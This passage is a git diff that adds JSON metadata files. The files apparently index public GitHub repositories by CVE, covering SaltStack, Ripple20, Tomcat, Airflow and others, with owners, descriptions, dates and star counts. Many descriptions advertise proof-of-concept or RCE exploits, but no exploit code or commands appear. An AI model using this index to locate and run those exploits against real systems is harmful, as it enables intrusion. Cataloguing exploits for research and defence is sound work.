+ "login": "jasperla", + "id": 637504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/637504?v=4", + "html_url": "https:\/\/github.com\/jasperla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jasperla\/CVE-2020-11651-poc", + "description": "PoC exploit of CVE-2020-11651 and CVE-2020-11652", + "fork": false, + "created_at": "2020-05-04T11:52:28Z", + "updated_at": "2024-11-13T07:38:40Z", + "pushed_at": "2020-07-10T09:30:47Z", + "stargazers_count": 120, + "watchers_count": 120, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 46, + "watchers": 120, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 261217390, + "name": "SaltStack-Exp", + "full_name": "bravery9\/SaltStack-Exp", + "owner": { + "login": "bravery9", + "id": 34338448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34338448?v=4", + "html_url": "https:\/\/github.com\/bravery9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bravery9\/SaltStack-Exp", + "description": "CVE-2020-11651&&CVE-2020-11652 EXP", + "fork": false, + "created_at": "2020-05-04T15:07:11Z", + "updated_at": "2024-08-12T20:01:05Z", + "pushed_at": "2020-05-04T14:23:13Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 261289637, + "name": "CVE-2020-11651", + "full_name": "kevthehermit\/CVE-2020-11651", + "owner": { + "login": "kevthehermit", + "id": 2545096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2545096?v=4", + "html_url": "https:\/\/github.com\/kevthehermit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kevthehermit\/CVE-2020-11651", + "description": "PoC for CVE-2020-11651", + "fork": false, + "created_at": "2020-05-04T20:34:04Z", + "updated_at": "2024-08-12T20:01:06Z", + "pushed_at": "2020-05-04T20:39:49Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 261951068, + "name": "cve-2020-11651-exp-plus", + "full_name": "lovelyjuice\/cve-2020-11651-exp-plus", + "owner": { + "login": "lovelyjuice", + "id": 20644461, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20644461?v=4", + "html_url": "https:\/\/github.com\/lovelyjuice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lovelyjuice\/cve-2020-11651-exp-plus", + "description": null, + "fork": false, + "created_at": "2020-05-07T04:41:25Z", + "updated_at": "2024-08-12T20:01:11Z", + "pushed_at": "2020-05-09T07:29:21Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-11651" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 262004654, + "name": "CVE-2020-11651-CVE-2020-11652-EXP", + "full_name": "ssrsec\/CVE-2020-11651-CVE-2020-11652-EXP", + "owner": { + "login": "ssrsec", + "id": 48439183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48439183?v=4", + "html_url": "https:\/\/github.com\/ssrsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ssrsec\/CVE-2020-11651-CVE-2020-11652-EXP", + "description": "CVE-2020-11651&&CVE-2020-11652 EXP", + "fork": false, + "created_at": "2020-05-07T09:17:39Z", + "updated_at": "2024-10-07T03:30:01Z", + "pushed_at": "2023-03-21T10:02:22Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 262555019, + "name": "CVE-2020-11651", + "full_name": "RakhithJK\/CVE-2020-11651", + "owner": { + "login": "RakhithJK", + "id": 37833354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37833354?v=4", + "html_url": "https:\/\/github.com\/RakhithJK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RakhithJK\/CVE-2020-11651", + "description": "PoC for CVE-2020-11651", + "fork": false, + "created_at": "2020-05-09T11:22:25Z", + "updated_at": "2020-05-11T19:17:30Z", + "pushed_at": "2020-05-04T20:39:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 317171675, + "name": "salt-rce-scanner-CVE-2020-11651-CVE-2020-11652", + "full_name": "appcheck-ng\/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652", + "owner": { + "login": "appcheck-ng", + "id": 72451531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72451531?v=4", + "html_url": "https:\/\/github.com\/appcheck-ng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/appcheck-ng\/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652", + "description": "Scanning tool to test for SaltStack vulnerabilities CVE-2020-11651 & CVE-2020-11652.", + "fork": false, + "created_at": "2020-11-30T09:23:23Z", + "updated_at": "2020-11-30T09:48:22Z", + "pushed_at": "2020-11-30T09:26:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 733072535, + "name": "CVE-2020-11651-PoC", + "full_name": "hardsoftsecurity\/CVE-2020-11651-PoC", + "owner": { + "login": "hardsoftsecurity", + "id": 45432332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45432332?v=4", + "html_url": "https:\/\/github.com\/hardsoftsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hardsoftsecurity\/CVE-2020-11651-PoC", + "description": "Repository that contains a CVE-2020-11651 Exploit updated to work with the latest versions of python.", + "fork": false, + "created_at": "2023-12-18T13:56:42Z", + "updated_at": "2023-12-18T14:00:13Z", + "pushed_at": "2023-12-18T14:08:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11652.json b/2020/CVE-2020-11652.json new file mode 100644 index 0000000000..7c9e8bc677 --- /dev/null +++ b/2020/CVE-2020-11652.json @@ -0,0 +1,95 @@ +[ + { + "id": 266052274, + "name": "CVE-2020-11652", + "full_name": "fanjq99\/CVE-2020-11652", + "owner": { + "login": "fanjq99", + "id": 7722923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7722923?v=4", + "html_url": "https:\/\/github.com\/fanjq99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fanjq99\/CVE-2020-11652", + "description": "saltstack CVE-2020-11652 ", + "fork": false, + "created_at": "2020-05-22T07:56:32Z", + "updated_at": "2020-05-22T08:34:26Z", + "pushed_at": "2020-05-22T08:32:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 324276134, + "name": "CVE-2020-11652", + "full_name": "Al1ex\/CVE-2020-11652", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-11652", + "description": "CVE-2020-11652 & CVE-2020-11651", + "fork": false, + "created_at": "2020-12-25T02:58:35Z", + "updated_at": "2024-08-12T20:08:50Z", + "pushed_at": "2020-12-25T02:58:51Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 744326789, + "name": "CVE-2020-11652-POC", + "full_name": "limon768\/CVE-2020-11652-POC", + "owner": { + "login": "limon768", + "id": 61067252, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61067252?v=4", + "html_url": "https:\/\/github.com\/limon768", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/limon768\/CVE-2020-11652-POC", + "description": "This is a fix POC CVE-2020-11651 & CVE-2020-11651", + "fork": false, + "created_at": "2024-01-17T04:15:16Z", + "updated_at": "2024-07-25T00:15:40Z", + "pushed_at": "2024-01-17T04:26:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11738.json b/2020/CVE-2020-11738.json new file mode 100644 index 0000000000..f05a3ef078 --- /dev/null +++ b/2020/CVE-2020-11738.json @@ -0,0 +1,33 @@ +[ + { + "id": 815506000, + "name": "wordpress-snapcreek", + "full_name": "raghu66669999\/wordpress-snapcreek", + "owner": { + "login": "raghu66669999", + "id": 39025084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39025084?v=4", + "html_url": "https:\/\/github.com\/raghu66669999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raghu66669999\/wordpress-snapcreek", + "description": "snapcreek_duplicator file read vulnerability https:\/\/www.cvedetails.com\/cve\/CVE-2020-11738\/", + "fork": false, + "created_at": "2024-06-15T11:09:41Z", + "updated_at": "2024-06-15T11:12:00Z", + "pushed_at": "2024-06-15T11:11:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11794.json b/2020/CVE-2020-11794.json new file mode 100644 index 0000000000..b7c173bfd1 --- /dev/null +++ b/2020/CVE-2020-11794.json @@ -0,0 +1,33 @@ +[ + { + "id": 261415522, + "name": "CVE-2020-11794", + "full_name": "w4cky\/CVE-2020-11794", + "owner": { + "login": "w4cky", + "id": 25501286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25501286?v=4", + "html_url": "https:\/\/github.com\/w4cky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w4cky\/CVE-2020-11794", + "description": "I have discovered a vulnerability in OpenTouch Multimedia Services, making it possible for an attacker with administration rights to execute code on the server via web requests with high privileges.", + "fork": false, + "created_at": "2020-05-05T09:39:55Z", + "updated_at": "2020-12-12T12:10:23Z", + "pushed_at": "2020-08-26T13:30:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11819.json b/2020/CVE-2020-11819.json new file mode 100644 index 0000000000..f3f1cd83bb --- /dev/null +++ b/2020/CVE-2020-11819.json @@ -0,0 +1,33 @@ +[ + { + "id": 351496432, + "name": "PoC-RCE-Rukovoditel", + "full_name": "danyx07\/PoC-RCE-Rukovoditel", + "owner": { + "login": "danyx07", + "id": 38260120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38260120?v=4", + "html_url": "https:\/\/github.com\/danyx07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danyx07\/PoC-RCE-Rukovoditel", + "description": "Proof of concept for CVE-2020-11819 and CVE-2020-15946", + "fork": false, + "created_at": "2021-03-25T16:03:24Z", + "updated_at": "2021-03-25T16:19:03Z", + "pushed_at": "2021-03-25T16:17:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11851.json b/2020/CVE-2020-11851.json new file mode 100644 index 0000000000..a8e96b6c82 --- /dev/null +++ b/2020/CVE-2020-11851.json @@ -0,0 +1,33 @@ +[ + { + "id": 327605894, + "name": "CVE-2020-11851", + "full_name": "ch1nghz\/CVE-2020-11851", + "owner": { + "login": "ch1nghz", + "id": 51833205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51833205?v=4", + "html_url": "https:\/\/github.com\/ch1nghz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ch1nghz\/CVE-2020-11851", + "description": "Remote Code Execution vulnerability on ArcSight Logger", + "fork": false, + "created_at": "2021-01-07T12:30:23Z", + "updated_at": "2021-01-26T14:57:51Z", + "pushed_at": "2021-01-24T09:28:08Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 20, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11881.json b/2020/CVE-2020-11881.json new file mode 100644 index 0000000000..d9a5fb3103 --- /dev/null +++ b/2020/CVE-2020-11881.json @@ -0,0 +1,33 @@ +[ + { + "id": 272965772, + "name": "CVE-2020-11881", + "full_name": "botlabsDev\/CVE-2020-11881", + "owner": { + "login": "botlabsDev", + "id": 54632107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54632107?v=4", + "html_url": "https:\/\/github.com\/botlabsDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/botlabsDev\/CVE-2020-11881", + "description": "CVE-2020-11881: unauthenticated remote DoS for MikroTik SMB service.", + "fork": false, + "created_at": "2020-06-17T12:15:56Z", + "updated_at": "2024-07-08T19:26:59Z", + "pushed_at": "2020-09-26T13:33:27Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11883.json b/2020/CVE-2020-11883.json new file mode 100644 index 0000000000..10aa1bdf58 --- /dev/null +++ b/2020/CVE-2020-11883.json @@ -0,0 +1,33 @@ +[ + { + "id": 343238036, + "name": "CVE-2020-11883", + "full_name": "0ndras3k\/CVE-2020-11883", + "owner": { + "login": "0ndras3k", + "id": 57116019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57116019?v=4", + "html_url": "https:\/\/github.com\/0ndras3k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0ndras3k\/CVE-2020-11883", + "description": "vue-storefront-api vulnerability", + "fork": false, + "created_at": "2021-02-28T23:26:22Z", + "updated_at": "2021-11-07T19:16:47Z", + "pushed_at": "2021-03-01T10:42:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11890.json b/2020/CVE-2020-11890.json new file mode 100644 index 0000000000..0ebc55f719 --- /dev/null +++ b/2020/CVE-2020-11890.json @@ -0,0 +1,33 @@ +[ + { + "id": 257814956, + "name": "CVE-2020-11890", + "full_name": "HoangKien1020\/CVE-2020-11890", + "owner": { + "login": "HoangKien1020", + "id": 24661746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4", + "html_url": "https:\/\/github.com\/HoangKien1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2020-11890", + "description": "CVE-2020-11890: Improper input validations in the usergroup table class could lead to a broken ACL configuration to RCE", + "fork": false, + "created_at": "2020-04-22T06:42:50Z", + "updated_at": "2024-08-12T20:00:34Z", + "pushed_at": "2023-06-01T17:32:54Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 62, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11896.json b/2020/CVE-2020-11896.json new file mode 100644 index 0000000000..84bb38256f --- /dev/null +++ b/2020/CVE-2020-11896.json @@ -0,0 +1,64 @@ +[ + { + "id": 281287041, + "name": "Treck20-Related", + "full_name": "Fans0n-Fan\/Treck20-Related", + "owner": { + "login": "Fans0n-Fan", + "id": 62650136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62650136?v=4", + "html_url": "https:\/\/github.com\/Fans0n-Fan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fans0n-Fan\/Treck20-Related", + "description": "PoC for CVE-2020-11896 Treck TCP\/IP stack and device asset investigation", + "fork": false, + "created_at": "2020-07-21T03:38:31Z", + "updated_at": "2024-03-29T13:07:50Z", + "pushed_at": "2020-09-03T06:37:46Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 572658457, + "name": "ripple20-digi-connect-exploit", + "full_name": "0xkol\/ripple20-digi-connect-exploit", + "owner": { + "login": "0xkol", + "id": 58270928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58270928?v=4", + "html_url": "https:\/\/github.com\/0xkol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkol\/ripple20-digi-connect-exploit", + "description": "RCE exploit for CVE-2020-11896 (Ripple20 IP-in-IP Heap Overflow Vulnerability) targeting Digi Connect ME 9210", + "fork": false, + "created_at": "2022-11-30T18:44:25Z", + "updated_at": "2024-07-01T23:06:14Z", + "pushed_at": "2022-11-30T18:46:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11898.json b/2020/CVE-2020-11898.json new file mode 100644 index 0000000000..c7eff38407 --- /dev/null +++ b/2020/CVE-2020-11898.json @@ -0,0 +1,33 @@ +[ + { + "id": 501669416, + "name": "POC_CVE-2020-11898", + "full_name": "scamwork\/POC_CVE-2020-11898", + "owner": { + "login": "scamwork", + "id": 30245688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30245688?v=4", + "html_url": "https:\/\/github.com\/scamwork", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scamwork\/POC_CVE-2020-11898", + "description": null, + "fork": false, + "created_at": "2022-06-09T13:42:01Z", + "updated_at": "2023-11-08T06:39:47Z", + "pushed_at": "2022-06-09T13:50:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11932.json b/2020/CVE-2020-11932.json new file mode 100644 index 0000000000..6f7c54d0a5 --- /dev/null +++ b/2020/CVE-2020-11932.json @@ -0,0 +1,98 @@ +[ + { + "id": 262816666, + "name": "CVE-2020-11932", + "full_name": "ProjectorBUg\/CVE-2020-11932", + "owner": { + "login": "ProjectorBUg", + "id": 64981388, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64981388?v=4", + "html_url": "https:\/\/github.com\/ProjectorBUg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ProjectorBUg\/CVE-2020-11932", + "description": "Double-Free BUG in WhatsApp exploit poc.", + "fork": false, + "created_at": "2020-05-10T15:25:59Z", + "updated_at": "2024-10-12T20:37:08Z", + "pushed_at": "2020-05-10T15:32:54Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bug", + "whatsapp" + ], + "visibility": "public", + "forks": 36, + "watchers": 94, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 263900224, + "name": "CVE-2020-11932", + "full_name": "Staubgeborener\/CVE-2020-11932", + "owner": { + "login": "Staubgeborener", + "id": 28908603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28908603?v=4", + "html_url": "https:\/\/github.com\/Staubgeborener", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Staubgeborener\/CVE-2020-11932", + "description": "Check CVE-2020-11932 (ubuntu server) and test host relating to this vulnerability ", + "fork": false, + "created_at": "2020-05-14T11:47:52Z", + "updated_at": "2024-03-12T08:44:15Z", + "pushed_at": "2020-05-16T06:21:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 352007665, + "name": "CVE-2020-11932", + "full_name": "code-developers\/CVE-2020-11932", + "owner": { + "login": "code-developers", + "id": 81155753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81155753?v=4", + "html_url": "https:\/\/github.com\/code-developers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/code-developers\/CVE-2020-11932", + "description": null, + "fork": false, + "created_at": "2021-03-27T07:14:58Z", + "updated_at": "2021-03-27T08:03:18Z", + "pushed_at": "2021-03-27T07:42:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11975.json b/2020/CVE-2020-11975.json new file mode 100644 index 0000000000..460022e2f3 --- /dev/null +++ b/2020/CVE-2020-11975.json @@ -0,0 +1,33 @@ +[ + { + "id": 315527204, + "name": "unomi_exploit", + "full_name": "1135\/unomi_exploit", + "owner": { + "login": "1135", + "id": 19515911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19515911?v=4", + "html_url": "https:\/\/github.com\/1135", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1135\/unomi_exploit", + "description": "CVE-2020-11975 CVE-2020-13942", + "fork": false, + "created_at": "2020-11-24T05:23:42Z", + "updated_at": "2024-04-03T01:26:34Z", + "pushed_at": "2020-12-01T08:25:06Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11978.json b/2020/CVE-2020-11978.json new file mode 100644 index 0000000000..9bc3764e4d --- /dev/null +++ b/2020/CVE-2020-11978.json @@ -0,0 +1,33 @@ +[ + { + "id": 369849369, + "name": "CVE-2020-11978", + "full_name": "pberba\/CVE-2020-11978", + "owner": { + "login": "pberba", + "id": 6505743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6505743?v=4", + "html_url": "https:\/\/github.com\/pberba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pberba\/CVE-2020-11978", + "description": "PoC of how to exploit a RCE vulnerability of the example DAGs in Apache Airflow <1.10.11 ", + "fork": false, + "created_at": "2021-05-22T15:58:01Z", + "updated_at": "2023-10-25T07:24:37Z", + "pushed_at": "2021-06-01T18:17:15Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11989.json b/2020/CVE-2020-11989.json new file mode 100644 index 0000000000..5d7640fc13 --- /dev/null +++ b/2020/CVE-2020-11989.json @@ -0,0 +1,33 @@ +[ + { + "id": 305056797, + "name": "HYWZ36-CVE-2020-11989-code", + "full_name": "HYWZ36\/HYWZ36-CVE-2020-11989-code", + "owner": { + "login": "HYWZ36", + "id": 27775281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27775281?v=4", + "html_url": "https:\/\/github.com\/HYWZ36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HYWZ36\/HYWZ36-CVE-2020-11989-code", + "description": null, + "fork": false, + "created_at": "2020-10-18T08:34:47Z", + "updated_at": "2020-10-19T08:52:49Z", + "pushed_at": "2020-10-19T08:52:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11990.json b/2020/CVE-2020-11990.json new file mode 100644 index 0000000000..7e1219bb08 --- /dev/null +++ b/2020/CVE-2020-11990.json @@ -0,0 +1,33 @@ +[ + { + "id": 335859079, + "name": "CVE-2020-11990-Cordova", + "full_name": "forse01\/CVE-2020-11990-Cordova", + "owner": { + "login": "forse01", + "id": 76189258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76189258?v=4", + "html_url": "https:\/\/github.com\/forse01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forse01\/CVE-2020-11990-Cordova", + "description": null, + "fork": false, + "created_at": "2021-02-04T06:22:06Z", + "updated_at": "2021-02-25T07:46:20Z", + "pushed_at": "2021-02-09T03:16:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-11996.json b/2020/CVE-2020-11996.json new file mode 100644 index 0000000000..9637e32e9d --- /dev/null +++ b/2020/CVE-2020-11996.json @@ -0,0 +1,33 @@ +[ + { + "id": 282904807, + "name": "tomcat-embed-core-9.0.31-CVE-2020-11996", + "full_name": "rusakovichma\/tomcat-embed-core-9.0.31-CVE-2020-11996", + "owner": { + "login": "rusakovichma", + "id": 4024331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4024331?v=4", + "html_url": "https:\/\/github.com\/rusakovichma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rusakovichma\/tomcat-embed-core-9.0.31-CVE-2020-11996", + "description": "tomcat-embed-core-9.0.31 CVE-2020-11996 Test PoC", + "fork": false, + "created_at": "2020-07-27T13:22:21Z", + "updated_at": "2023-03-14T10:00:09Z", + "pushed_at": "2022-01-21T23:48:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1206.json b/2020/CVE-2020-1206.json new file mode 100644 index 0000000000..3decfab4f0 --- /dev/null +++ b/2020/CVE-2020-1206.json @@ -0,0 +1,130 @@ +[ + { + "id": 253272337, + "name": "CVE-2020-1206-POC", + "full_name": "jamf\/CVE-2020-1206-POC", + "owner": { + "login": "jamf", + "id": 1423569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1423569?v=4", + "html_url": "https:\/\/github.com\/jamf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jamf\/CVE-2020-1206-POC", + "description": "CVE-2020-1206 Uninitialized Kernel Memory Read POC", + "fork": false, + "created_at": "2020-04-05T15:52:43Z", + "updated_at": "2024-11-26T14:48:52Z", + "pushed_at": "2020-06-09T20:41:32Z", + "stargazers_count": 145, + "watchers_count": 145, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-1206", + "poc", + 